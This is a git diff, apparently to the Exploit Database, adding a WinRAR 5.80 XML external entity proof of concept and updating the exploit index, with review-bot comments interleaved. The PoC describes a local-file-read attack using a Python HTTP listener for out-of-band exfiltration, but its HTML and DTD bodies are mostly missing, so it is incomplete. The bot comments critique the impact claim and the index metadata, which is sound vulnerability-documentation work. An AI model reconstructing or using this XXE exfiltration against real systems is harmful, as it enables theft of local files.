diff --git a/exploits/xml/local/47526.txt b/exploits/xml/local/47526.txt new file mode 100644 index 000000000..af8eea29a --- /dev/null +++ b/exploits/xml/local/47526.txt @@ -0,0 +1,38 @@ +# Exploit Title: winrar 5.80 - XML External Entity Injection +# Exploit Author: albalawi +# Vendor Homepage: https://win-rar.com/fileadmin/winrar-versions/winrar-x64-58b2.exe +# Version: 5.80 +# Tested on: Microsoft Windows Version 10.0.18362.418 64bit + +# POC + +1- python -m SimpleHTTPServer (listens Port 8000) +2- open winrar or any file.rar +3- help +4- help topics +5- Drag the exploit to the window + + +html file + + + + + + + +%dtd;]> +&send; + + + + + + +============================== +start.dtd + + +"> +%all; \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index e47939e03..6a627cf98 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
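Review bot: The HTML and `start.dtd` bodies are empty in the hunk as committed — only `%dtd;]>`, `&send;`, `">` and `%all;` survive — so the PoC cannot be reproduced from this file; the entity declarations (the local file to read and the callback to the `SimpleHTTPServer` listener on port 8000 that `&send;` implies) need to be restored, as they were possibly stripped as markup. The steps also leave the impact claim imprecise: the user must drag an attacker-supplied HTML file into WinRAR's Help Topics window, so the DTD appears to be parsed by the help viewer's HTML renderer rather than by WinRAR's archive handling, and the outcome is out-of-band read of a local file rather than code execution — the advisory should name the component that parses the XML and state that the attack needs this user interaction.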
@@ -6579,6 +6579,8 @@ id,file,description,date,author,type,platform,port
 47489,exploits/windows/dos/47489.txt,"Windows Kernel - Out-of-Bounds Read in nt!MiRelocateImage While Parsing Malformed PE File",2019-10-10,"Google Security Research",dos,windows,
 47494,exploits/windows/dos/47494.py,"SpotAuditor 5.3.1.0 - Denial of Service",2019-10-14,"Sanjana shetty",dos,windows,
 47495,exploits/windows/dos/47495.py,"ActiveFax Server 6.92 Build 0316 - 'POP3 Server' Denial of Service",2019-10-14,stresser,dos,windows,
+47525,exploits/windows/dos/47525.txt,"winrar 5.80 64bit - Denial of Service",2019-10-21,alblalawi,dos,windows,
+47528,exploits/windows/dos/47528.txt,"Adobe Acrobat Reader DC for Windows - Heap-Based Buffer Overflow due to Malformed JP2 Stream (2)",2019-10-21,"Google Security Research",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -10716,7 +10718,7 @@ id,file,description,date,author,type,platform,port
 47482,exploits/linux/local/47482.rb,"ASX to MP3 converter 3.1.3.7 - '.asx' Local Stack Overflow (Metasploit_ DEP Bypass)",2019-10-10,max7253,local,linux,
 47490,exploits/windows/local/47490.txt,"National Instruments Circuit Design Suite 14.0 - Local Privilege Escalation",2019-10-11,"Ivan Marmolejo",local,windows,
 47493,exploits/windows/local/47493.txt,"Uplay 92.0.0.6280 - Local Privilege Escalation",2019-10-14,"Kusol Watchara-Apanukorn",local,windows,
-47502,exploits/linux/local/47502.py,"sudo 1.2.27 - Security Bypass",2019-10-15,"Mohin Paramasivam",local,linux,
+47502,exploits/linux/local/47502.py,"sudo 1.8.27 - Security Bypass",2019-10-15,"Mohin Paramasivam",local,linux,
 47503,exploits/windows/local/47503.txt,"ActiveFax Server 6.92 Build 0316 - 'ActiveFaxServiceNT' Unquoted Service Path",2019-10-15,cakes,local,windows,
 47504,exploits/windows/local/47504.txt,"Lavasoft 2.3.4.7 - 'LavasoftTcpService' Unquoted Service Path",2019-10-16,"Luis MedinaL",local,windows,
 47506,exploits/windows/local/47506.txt,"Zilab Remote Console Server 3.2.9 - 'zrcs' Unquoted Service Path",2019-10-16,cakes,local,windows,
@@ -10727,6 +10729,9 @@ id,file,description,date,author,type,platform,port
 47521,exploits/windows/local/47521.txt,"BlackMoon FTP Server 3.1.2.1731 - 'BMFTP-RELEASE' Unquoted Serive Path",2019-10-17,"Debashis Pal",local,windows,
 47522,exploits/windows/local/47522.txt,"Web Companion versions 5.1.1035.1047 - 'WCAssistantService' Unquoted Service Path",2019-10-17,"Debashis Pal",local,windows,
 47523,exploits/windows/local/47523.txt,"WorkgroupMail 7.5.1 - 'WorkgroupMail' Unquoted Service Path",2019-10-17,cakes,local,windows,
+47526,exploits/xml/local/47526.txt,"winrar 5.80 - XML External Entity Injection",2019-10-21,alblalawi,local,xml,
+47527,exploits/windows/local/47527.txt,"Trend Micro Anti-Threat Toolkit 1.62.0.1218 - Remote Code Execution",2019-10-21,hyp3rlinx,local,windows,
+47529,exploits/solaris/local/47529.txt,"Solaris 11.4 - xscreensaver Privilege Escalation",2019-10-21,"Marco Ivaldi",local,solaris,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
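Review bot: The new 47526 row records `xml` as its platform, but the `platform` column in this index is the target OS (`windows`, `linux`, `solaris` in the neighbouring rows) and 47526's own header says it was tested on Windows 10 against WinRAR 5.80; the sibling 47525 row from the same author, with the same reproduction steps, is filed under `exploits/windows/dos`. I would move the file to `exploits/windows/local/47526.txt` and make the row `47526,exploits/windows/local/47526.txt,"winrar 5.80 - XML External Entity Injection",2019-10-21,alblalawi,local,windows,` so searches by platform find it. The 47527 row's `local` type also contradicts that advisory's "Remote Code Execution" title; one of the two should change so the index and the file agree.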
@@ -41844,7 +41849,6 @@ id,file,description,date,author,type,platform,port
 47498,exploits/php/webapps/47498.txt,"Kirona-DRS 5.5.3.5 - Information Disclosure",2019-10-14,Ramikan,webapps,php,
 47501,exploits/php/webapps/47501.txt,"Bolt CMS 3.6.10 - Cross-Site Request Forgery",2019-10-15,r3m0t3nu11,webapps,php,
 47505,exploits/php/webapps/47505.txt,"Accounts Accounting 7.02 - Persistent Cross-Site Scripting",2019-10-16,"Debashis Pal",webapps,php,
-47512,exploits/linux/webapps/47512.txt,"CyberArk Password Vault 10.6 - Authentication Bypass",2019-10-16,"Daniel Martinez Adan",webapps,linux,
 47516,exploits/php/webapps/47516.txt,"Wordpress FooGallery 1.8.12 - Persistent Cross-Site Scripting",2019-10-17,Unk9vvN,webapps,php,
 47517,exploits/php/webapps/47517.txt,"Wordpress Soliloquy Lite 2.5.6 - Persistent Cross-Site Scripting",2019-10-17,Unk9vvN,webapps,php,
 47518,exploits/php/webapps/47518.txt,"Wordpress Popup Builder 3.49 - Persistent Cross-Site Scripting",2019-10-17,Unk9vvN,webapps,php,